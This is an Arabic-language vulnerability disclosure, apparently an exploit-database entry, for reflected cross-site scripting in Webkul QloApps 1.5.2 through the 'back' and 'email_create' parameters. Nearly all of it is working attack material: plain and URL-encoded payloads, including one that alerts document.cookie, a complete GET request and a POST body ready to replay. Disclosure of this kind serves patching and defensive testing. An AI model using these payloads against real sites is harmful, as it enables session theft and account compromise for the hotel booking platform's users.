
QloApp 1.5.2: عرضة لـ XSS على معاملين (email_create و back)
Webkul QloApps 1.5.2: عرضة لهجوم XSS على معلمتين (email_create و back)
الحمولة (المعامل back – نص عادي):
[xss onfocus=alert(1) autofocus= xss]
الحمولة (المعامل back – مشفر بعنوان URL):
[xss%20onfocus%3dalert(1)%20autofocus%3d%20xss]
طلب GET كامل (المعامل back):
[http://localhost/hotelcommerce-1.5.2/?rand=1679996611398&controller=authentication&SubmitCreate=1&ajax=true&email_create=a&back=xss%20onfocus%3dalert(1)%20autofocus%3d%20xss&token=6c62b773f1b284ac4743871b300a0c4d]

الحمولة (المعامل email_create – نص عادي):
[xss>xss]
الحمولة (المعامل email_create – مشفر بعنوان URL):
[xss%3e%3cimg%20src%3da%20onerror%3dalert(document.cookie)%3exss]
طلب POST (المعامل email_create) (بيانات طلب POST فقط):
[controller=authentication&SubmitCreate=1&ajax=true&email_create=xss%3e%3cimg%20src%3da%20onerror%3dalert(document.cookie)%3exss&back=my-account&token=6c62b773f1b284ac4743871b300a0c4d]

تم التأكيد في: 30 مارس 2023
المورد: QloApps [https://github.com/webkul/hotelcommerce]